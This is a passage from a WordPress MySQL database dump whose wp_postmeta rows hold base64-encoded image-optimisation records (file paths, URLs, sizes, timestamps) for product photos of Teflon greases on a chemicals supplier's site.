ncmVhc2UtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbWFyaW5lLWdyZWFzZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTUzOCwiaWQiOjE0NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbWFyaW5lLWdyZWFzZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tYXJpbmUtZ3JlYXNlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW1hcmluZS1ncmVhc2UtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk1NDEsImlkIjoxNDU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW1hcmluZS1ncmVhc2UtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbWFyaW5lLWdyZWFzZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tYXJpbmUtZ3JlYXNlLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NTQzLCJpZCI6MTQ1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tYXJpbmUtZ3JlYXNlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW1hcmluZS1ncmVhc2UtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbWFyaW5lLWdyZWFzZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTU0NiwiaWQiOjE0NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbWFyaW5lLWdyZWFzZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tYXJpbmUtZ3JlYXNlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW1hcmluZS1ncmVhc2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk1NDksImlkIjoxNDU0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29448, 1453, 'wpfc_optimisation_reduction', '1395005'); 
INSERT INTO `wp_postmeta` VALUES (29449, 1453, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQuanBnIiwicmVkdWN0aW9uIjoxMzk0OTkxLCJ0aW1lIjoxNDgzNTY5NTYxLCJpZCI6IjE0NTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTU2MywiaWQiOjE0NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NTY3LCJpZCI6MTQ1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk1NzAsImlkIjoxNDUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NTc0LCJpZCI6MTQ1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk1NzYsImlkIjoxNDUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTU3OSwiaWQiOjE0NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NTgyLCJpZCI6MTQ1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk1ODUsImlkIjoxNDUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NTg3LCJpZCI6MTQ1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTU5MCwiaWQiOjE0NTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk1OTIsImlkIjoxNDUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NTk1LCJpZCI6MTQ1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTU5OCwiaWQiOjE0NTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS10LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtdC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLXQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk2MDEsImlkIjoxNDUzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29450, 1452, 'wpfc_optimisation_reduction', '1153499'); 
INSERT INTO `wp_postmeta` VALUES (29451, 1452, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UuanBnIiwicmVkdWN0aW9uIjoxMTUzMzYwLCJ0aW1lIjoxNDgzNTY5NjEyLCJpZCI6IjE0NTIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTYxNSwiaWQiOjE0NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NjE4LCJpZCI6MTQ1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLWhpZ2gtdGVtcC1ncmVhc2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk2MjEsImlkIjoxNDUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NjI1LCJpZCI6MTQ1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24taGlnaC10ZW1wLWdyZWFzZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1oaWdoLXRlbXAtZ3JlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC